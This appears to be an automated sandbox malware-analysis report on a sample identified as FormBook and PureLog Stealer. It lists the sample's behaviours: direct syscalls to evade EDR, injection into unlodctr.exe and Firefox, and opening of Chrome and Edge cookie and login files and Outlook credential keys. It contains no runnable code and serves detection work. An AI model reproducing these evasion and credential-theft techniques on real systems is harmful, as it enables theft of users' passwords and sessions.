Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D8BF0 mov eax, dword ptr fs:[00000030h] 4_2_019D8BF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D8BF0 mov eax, dword ptr fs:[00000030h] 4_2_019D8BF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7EBD0 mov eax, dword ptr fs:[00000030h] 4_2_01A7EBD0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A98B28 mov eax, dword ptr fs:[00000030h] 4_2_01A98B28
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A98B28 mov eax, dword ptr fs:[00000030h] 4_2_01A98B28
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4EB1D mov eax, dword ptr fs:[00000030h] 4_2_01A4EB1D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FEB20 mov eax, dword ptr fs:[00000030h] 4_2_019FEB20
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FEB20 mov eax, dword ptr fs:[00000030h] 4_2_019FEB20
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019CCB7E mov eax, dword ptr fs:[00000030h] 4_2_019CCB7E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A84B4B mov eax, dword ptr fs:[00000030h] 4_2_01A84B4B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A84B4B mov eax, dword ptr fs:[00000030h] 4_2_01A84B4B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A78B42 mov eax, dword ptr fs:[00000030h] 4_2_01A78B42
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A66B40 mov eax, dword ptr fs:[00000030h] 4_2_01A66B40
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A66B40 mov eax, dword ptr fs:[00000030h] 4_2_01A66B40
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A9AB40 mov eax, dword ptr fs:[00000030h] 4_2_01A9AB40
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7EB50 mov eax, dword ptr fs:[00000030h] 4_2_01A7EB50
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A26AA4 mov eax, dword ptr fs:[00000030h] 4_2_01A26AA4
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019DEA80 mov eax, dword ptr fs:[00000030h] 4_2_019DEA80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4A80 mov eax, dword ptr fs:[00000030h] 4_2_01AA4A80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A08A90 mov edx, dword ptr fs:[00000030h] 4_2_01A08A90
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D8AA0 mov eax, dword ptr fs:[00000030h] 4_2_019D8AA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D8AA0 mov eax, dword ptr fs:[00000030h] 4_2_019D8AA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D0AD0 mov eax, dword ptr fs:[00000030h] 4_2_019D0AD0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0AAEE mov eax, dword ptr fs:[00000030h] 4_2_01A0AAEE
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0AAEE mov eax, dword ptr fs:[00000030h] 4_2_01A0AAEE
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A26ACC mov eax, dword ptr fs:[00000030h] 4_2_01A26ACC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A26ACC mov eax, dword ptr fs:[00000030h] 4_2_01A26ACC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A26ACC mov eax, dword ptr fs:[00000030h] 4_2_01A26ACC
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A04AD0 mov eax, dword ptr fs:[00000030h] 4_2_01A04AD0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A04AD0 mov eax, dword ptr fs:[00000030h] 4_2_01A04AD0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0CA24 mov eax, dword ptr fs:[00000030h] 4_2_01A0CA24
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0CA38 mov eax, dword ptr fs:[00000030h] 4_2_01A0CA38
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F4A35 mov eax, dword ptr fs:[00000030h] 4_2_019F4A35
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019F4A35 mov eax, dword ptr fs:[00000030h] 4_2_019F4A35
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019FEA2E mov eax, dword ptr fs:[00000030h] 4_2_019FEA2E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A5CA11 mov eax, dword ptr fs:[00000030h] 4_2_01A5CA11
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0A5B mov eax, dword ptr fs:[00000030h] 4_2_019E0A5B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019E0A5B mov eax, dword ptr fs:[00000030h] 4_2_019E0A5B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A7EA60 mov eax, dword ptr fs:[00000030h] 4_2_01A7EA60
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6A50 mov eax, dword ptr fs:[00000030h] 4_2_019D6A50
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6A50 mov eax, dword ptr fs:[00000030h] 4_2_019D6A50
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6A50 mov eax, dword ptr fs:[00000030h] 4_2_019D6A50
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6A50 mov eax, dword ptr fs:[00000030h] 4_2_019D6A50
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6A50 mov eax, dword ptr fs:[00000030h] 4_2_019D6A50
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6A50 mov eax, dword ptr fs:[00000030h] 4_2_019D6A50
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D6A50 mov eax, dword ptr fs:[00000030h] 4_2_019D6A50
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0CA6F mov eax, dword ptr fs:[00000030h] 4_2_01A0CA6F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0CA6F mov eax, dword ptr fs:[00000030h] 4_2_01A0CA6F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0CA6F mov eax, dword ptr fs:[00000030h] 4_2_01A0CA6F
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4CA72 mov eax, dword ptr fs:[00000030h] 4_2_01A4CA72
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A4CA72 mov eax, dword ptr fs:[00000030h] 4_2_01A4CA72
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A06DA0 mov eax, dword ptr fs:[00000030h] 4_2_01A06DA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A98DAE mov eax, dword ptr fs:[00000030h] 4_2_01A98DAE
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A98DAE mov eax, dword ptr fs:[00000030h] 4_2_01A98DAE
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01AA4DAD mov eax, dword ptr fs:[00000030h] 4_2_01AA4DAD
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0CDB1 mov ecx, dword ptr fs:[00000030h] 4_2_01A0CDB1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0CDB1 mov eax, dword ptr fs:[00000030h] 4_2_01A0CDB1
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A0CDB1 mov eax, dword ptr fs:[00000030h] 4_2_01A0CDB1
Enables debug privileges
Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtQueryInformationProcess: Direct from: 0x77392C26 Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtResumeThread: Direct from: 0x77392FBC Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtWriteVirtualMemory: Direct from: 0x7739490C Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtCreateUserProcess: Direct from: 0x7739371C Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtAllocateVirtualMemory: Direct from: 0x77392BFC Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtQuerySystemInformation: Direct from: 0x77392DFC Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtReadFile: Direct from: 0x77392ADC Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtDelayExecution: Direct from: 0x77392DDC Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtProtectVirtualMemory: Direct from: 0x77387B2E Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtWriteVirtualMemory: Direct from: 0x77392E3C Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtCreateMutant: Direct from: 0x773935CC Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtResumeThread: Direct from: 0x773936AC Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtMapViewOfSection: Direct from: 0x77392D1C Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtOpenKeyEx: Direct from: 0x77392B9C Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtSetInformationProcess: Direct from: 0x77392C5C Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtProtectVirtualMemory: Direct from: 0x77392F9C Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtNotifyChangeKey: Direct from: 0x77393C2C Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtQueryInformationToken: Direct from: 0x77392CAC Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtCreateFile: Direct from: 0x77392FEC Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtOpenFile: Direct from: 0x77392DCC Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtTerminateThread: Direct from: 0x77392FCC Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtDeviceIoControlFile: Direct from: 0x77392AEC Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtQueryValueKey: Direct from: 0x77392BEC Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtQuerySystemInformation: Direct from: 0x773948CC Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtQueryVolumeInformationFile: Direct from: 0x77392F2C Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtAllocateVirtualMemory: Direct from: 0x773948EC Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtOpenSection: Direct from: 0x77392E0C Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtOpenKeyEx: Direct from: 0x77393C9C Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtSetInformationThread: Direct from: 0x773863F9 Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtClose: Direct from: 0x77392B6C
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtSetInformationThread: Direct from: 0x77392B4C Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtReadVirtualMemory: Direct from: 0x77392E8C Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtCreateKey: Direct from: 0x77392C6C Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe NtQueryAttributesFile: Direct from: 0x77392E6C Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: NULL target: C:\Windows\SysWOW64\unlodctr.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: NULL target: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: NULL target: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\unlodctr.exe Thread register set: target process: 6952 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\unlodctr.exe Thread APC queued: target process: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" Jump to behavior
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Process created: C:\Windows\SysWOW64\unlodctr.exe "C:\Windows\SysWOW64\unlodctr.exe" Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000002.3514537839.0000000001881000.00000002.00000001.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000000.2735220796.0000000001881000.00000002.00000001.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3514699862.00000000011C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000002.3514537839.0000000001881000.00000002.00000001.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000000.2735220796.0000000001881000.00000002.00000001.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3514699862.00000000011C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000002.3514537839.0000000001881000.00000002.00000001.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000000.2735220796.0000000001881000.00000002.00000001.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3514699862.00000000011C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000002.3514537839.0000000001881000.00000002.00000001.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000000.2735220796.0000000001881000.00000002.00000001.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3514699862.00000000011C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2844593434.00000000018C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2843507028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513763448.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513480286.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513697990.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3514140722.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3514995651.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2851724313.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Yara detected PureLog Stealer
Source: Yara match File source: 0.2.file.exe.2c49a04.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7060000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2ed7478.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2ed4448.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2c49a04.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2c38d8c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7060000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2ed5460.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2c38d8c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2c0860c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2319668431.0000000007060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2315834889.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2315834889.0000000002D58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\unlodctr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2844593434.00000000018C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2843507028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513763448.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513480286.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513697990.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3514140722.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3514995651.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2851724313.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Yara detected PureLog Stealer
Source: Yara match File source: 0.2.file.exe.2c49a04.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7060000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2ed7478.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2ed4448.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2c49a04.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2c38d8c.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.7060000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2ed5460.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2c38d8c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.2c0860c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2319668431.0000000007060000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2315834889.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2315834889.0000000002D58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
